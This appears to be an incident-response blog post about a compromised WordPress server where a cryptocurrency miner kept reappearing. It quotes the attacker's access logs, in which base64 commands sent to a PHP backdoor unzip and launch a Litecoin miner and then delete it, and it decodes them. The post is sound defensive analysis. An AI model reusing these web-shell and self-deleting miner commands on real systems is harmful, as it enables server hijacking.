So, not to over hype, but everyone these days is excited about the idea of file-less malware to bypass traditional anti-malware techniques. I ran into a case last week in which I saw some techniques that evaded my traditional methods for locating malicious crypto coin miners ( prior examples one two), by removing the file after achieving their objective, in this case mining on the compromised server.
So we initially received a report of email not being processed on the server, after logging in the first tech immediately identified a load issue on the server and found the following in the running processes on the server.
./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:x
They killed the running process, and passed on continuing investigation. So I began to dig in ran two of our traditional malware scanners, but got no hits. I ran my minerchk tool, again no hits…
So dropped into a directory the prior technician made notes reffering to the intial investigation. Looking at it immediately tells me someone has been playing with seeing what kind of files they can upload to this site and compromise it.
drwxr-xr-x 2 user user 4096 Jan 20 07:50 ./ drwxr-xr-x 12 user user 4096 Jan 4 09:39 ../ -rw-r--r-- 1 user user 39 Jan 8 14:04 _1.php. -rw-r--r-- 1 user user 542 Jan 13 22:46 637161.php. -rw-r--r-- 1 user user 542 Jan 13 22:45 764102.php. -rw-r--r-- 1 user user 542 Jan 13 22:46 816293.php. -rw-r--r-- 1 user user 10924 Jan 8 14:28 a.php. -rw-r--r-- 1 user user 776 Jan 13 10:04 assig.php. -rw-r--r-- 1 user user 78 Jan 10 06:13 b.php. -rw-r--r-- 1 user user 78 Jan 10 09:55 b.php_1. -rw-r--r-- 1 user user 66879 Jan 11 20:49 class.print.php -rw-r--r-- 1 user user 66879 Jan 9 17:42 class.print.php. -rw-r--r-- 1 user user 40 Jan 8 13:38 c.php. -rw-r--r-- 1 user user 40 Jan 8 13:39 c.php_1. -rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_2. -rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_3. -rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_4. -rw-r--r-- 1 user user 40 Jan 8 13:42 c.php_5. -rw-r--r-- 1 user user 40 Jan 8 13:43 c.php_6. -rw-r--r-- 1 user user 26 Jan 11 03:04 c.php_7. -rw-r--r-- 1 user user 3179 Jan 9 09:19 error_log -rw-r--r-- 1 user user 13 Jan 11 00:00 f.txt -rw-r--r-- 1 user user 218 Jan 9 09:19 .htaccess -rw-r--r-- 1 user user 17 Jan 10 12:02 info.php_1.docx -rw-r--r-- 1 user user 17 Jan 9 12:06 info.php.docx -rw-r--r-- 1 user user 9798 Jan 10 08:29 M.php. -rw-r--r-- 1 user user 88 Jan 9 09:19 php.ini -rw-r--r-- 1 user user 473 Jan 9 16:53 print.php. -rw-r--r-- 1 user user 874 Jan 8 13:44 print.php_1. -rw-r--r-- 1 user user 34 Jan 9 06:47 q.php. -rw-r--r-- 1 user user 34 Jan 9 07:35 q.php_1. -rw-r--r-- 1 user user 2215 Jan 11 16:27 RxR_1515705760.php. -rw-r--r-- 1 user user 1493 Jan 12 10:00 shell1.php. -rw-r--r-- 1 user user 39 Jan 8 06:29 shell.php. -rw-r--r-- 1 user user 39 Jan 8 12:36 shell.php_1. -rw-r--r-- 1 user user 39 Jan 11 15:41 shell.php_2. -rw-r--r-- 1 user user 39 Jan 9 11:45 shell.php.docx -rw-r--r-- 1 user user 114 Jan 9 08:26 some.php. -rw-r--r-- 1 user user 114 Jan 9 08:26 some.php_1. -rw-r--r-- 1 user user 114 Jan 9 08:37 some.php_2. -rw-r--r-- 1 user user 114 Jan 9 08:37 some.php_3. -rw-r--r-- 1 user user 114 Jan 9 08:39 some.php_4. -rw-r--r-- 1 user user 114 Jan 9 08:39 some.php_5. -rw-r--r-- 1 user user 114 Jan 11 08:17 some.php_6. -rw-r--r-- 1 user user 114 Jan 11 08:17 some.php_7. -rw-r--r-- 1 user user 114 Jan 11 08:18 some.php_8. -rw-r--r-- 1 user user 114 Jan 11 08:18 some.php_9. -rw-r--r-- 1 user user 721 Jan 8 23:36 weba12.php.
Still no miner binary or configuration yet….
In the files present I saw 2 that were live back doors, so I disabled those, and continued the investigation. Running every variation I could think to search for the file “virusscan” or the syntax of the stratum+tcp used in nearly every miner in one way or another.
Well, no luck, I wrote up my report to the system owner alerting them to the php back doors and the upload function being abused on the site.
About to log off the system I ran a final check of running processes, look what’s back…
37031 user 20 0 773m 7844 1200 S 795.0 0.1 159:58.73 ./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:x
So I began to rework my investigation, thinking that some how I must have missed something, but no there was no file virusscan on the system. Here’s where I was finally able to confirm what was going on.
88.254.64.X - - [20/Jan/2018:09:21:03 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 9 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50" 88.254.64.X - - [20/Jan/2018:09:21:04 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 47 "-" "curl/7.57.0" 88.254.64.X - - [20/Jan/2018:09:21:07 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cGtpbGwgdmlydXNzY2FuOyB1bnppcCB2aXJ1c3NjYW4uemlw HTTP/1.1" 200 100 "-" "curl/7.57.0" 88.254.64.X - - [20/Jan/2018:09:21:09 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Y2htb2QgK3ggdmlydXNzY2Fu HTTP/1.1" 200 20 "-" "curl/7.57.0" 88.254.64.X - - [20/Jan/2018:09:21:11 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Li92aXJ1c3NjYW4gLS1hbGdvIHNjcnlwdCAtLXVybCBzdHJhdHVtK3RjcDovL2xpdGVjb2lucG9vbC5vcmc6MzMzMyAtLXVzZXJwYXNzIHNhbWVyYmJha2thci5leHQxOmFiY2RlZiAxPi9kZXYvbnVsbCAyPiYxICY= HTTP/1.1" 200 124 "-" "curl/7.57.0" 88.254.64.X - - [20/Jan/2018:09:21:13 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cm0gdmlydXMqOyBwcyBhdXggfCBncmVwIHZpcnVzc2Nhbg== HTTP/1.1" 200 394 "-" "curl/7.57.0"
We see first a POST to one of the previously identified php back doors. Afterwards the GET using the php syntax ?cmd=, not at allllllllllllllll suspicious. Looking at the text after the cmd.
cGtpbGwgdmlydXNzY2FuOyB1bnppcCB2aXJ1c3NjYW4uemlw Y2htb2QgK3ggdmlydXNzY2Fu Li92aXJ1c3NjYW4gLS1hbGdvIHNjcnlwdCAtLXVybCBzdHJhdHVtK3RjcDovL2xpdGVjb2lucG9vbC5vcmc6MzMzMyAtLXVzZXJwYXNzIHNhbWVyYmJha2thci5leHQxOmFiY2RlZiAxPi9kZXYvbnVsbCAyPiYxICY cm0gdmlydXMqOyBwcyBhdXggfCBncmVwIHZpcnVzc2Nhbg==
Pretty obvious that this is base64, the old standard of obfuscation 101. Bringing back to plain text we see this:
pkill virusscan; unzip virusscan.zip chmod +x virusscan ./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:abcdef 1>/dev/null 2>&1 & rm virus*; ps aux | grep virusscan
So we can see that the malicious actor posted the miner using the back door, then issue the commands necessary to make the file executable, start the process, and then remove the file, making it appear that it came from nowhere and keeping it a little more hidden from prying eyes looking for the miners origination.
So while there is a file on the system, it exists for only long enough to start the miner, so if you are unable to locate the backdoor then the miner will continue to come back.
Have you seen this technique before? have questions? Find me on twitter @laskow26.